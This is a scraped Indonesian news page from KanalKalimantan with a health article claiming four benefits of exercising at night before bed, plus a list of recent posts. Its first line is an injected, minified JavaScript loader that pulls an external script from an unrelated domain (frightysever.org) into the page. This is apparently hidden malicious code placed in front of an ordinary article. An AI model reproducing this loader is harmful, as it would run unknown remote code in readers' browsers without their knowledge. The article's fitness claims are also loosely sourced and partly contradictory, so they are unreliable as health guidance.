(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kesehatan

Biasa Olahraga Malam sebelum Tidur? Ini 4 Hal yang Terjadi pada Tubuh


KANALKALIMANTAN.COM, BANJARBARU– Olahraga rutin memang disarankan untuk menjaga kesehatan tubuh. Tapi, beberapa orang mungkin suka melakukan olahraga di pagi hari dan ada pula di malam hari sebelum tidur.

Menurut sains, olahraga malam sama sehat dan efisiennya dengan olahraga pagi hari. Olahraga malam hari ini juga tidak akan membuat aktivitas hidup Anda terbolak-balik.

Namun dilansir dari Bright Side, ada beberapa hal yang akan terjadi pada tubuh ketika rutin olahraga malam hari sebelum tidur.

 

1. Tidur lebih nyenyak

Banyak orang mengira olahraga sebelum tidur justru akan membuat tubuh terjaga sepanjang malam. Faktanya, olahraga malam hari justru akan meningkatkan kualitas tidur.

Baca juga : Wayang Pop Culture Karya Ilustrator Surabaya Diapresiasi Disney, Hingga Aktor Bennedict Cumberbatch

Menurut Penelitian ETH Zurich, olahraga malam hari yang baik untuk meningkatkan kualitas tidur adalah latihan HIIT yang bisa membantu mata lebih cepat terlelap.

 

2. Otot lebih cepat terbentuk

Rasio testosteron dan kortisol paling baik pada malam hari untuk pertumbuhan otot. Meskipun rasionya lebih tinggi di pagi hari, efek pembentukan otot bekerja sepenuhnya ketika matahari terbenam. Pada olahraga malam hari untuk membentuk otot, lebih baik fokus pada lari jarak jauh yang lebih ringan.

 

3. Melepaskan stres

Kebanyakan orang lebih sulit tertidur lelap ketika terlalu banyak pikiran atau stres. Tapi, olahraga sebelum tidur bisa membantu mengatasi stres, seperti olahraga yoga.

Yoga juga dikenal sebagai olahraga yang membantu mengurangi stres, kecemasan, memperlambat pikiran dan memperdalam napas. Olahraga ini bisa membantu lebih banyak oksigen masuk ke dalam tubuh.

 

4. Tubuh lebih bertenaga

Suhu tubuh akan meningkat antara jam 2 siang hingga jam 6 sore. Kondisi ini membuat Anda lebih berusaha keras melakukan latihan fisik atau olahraga.

Jadi, lari di malam hari bisa jadi pilihan terbaik. Sebuah studi menemukan berlari malam hari tanpa ada gangguan bisa membuat Anda berlari lebih cepat. (suara)

Editor: cell

 


Al Ghifari

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

14 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

17 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

17 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

19 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

21 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

22 jam ago

This website uses cookies.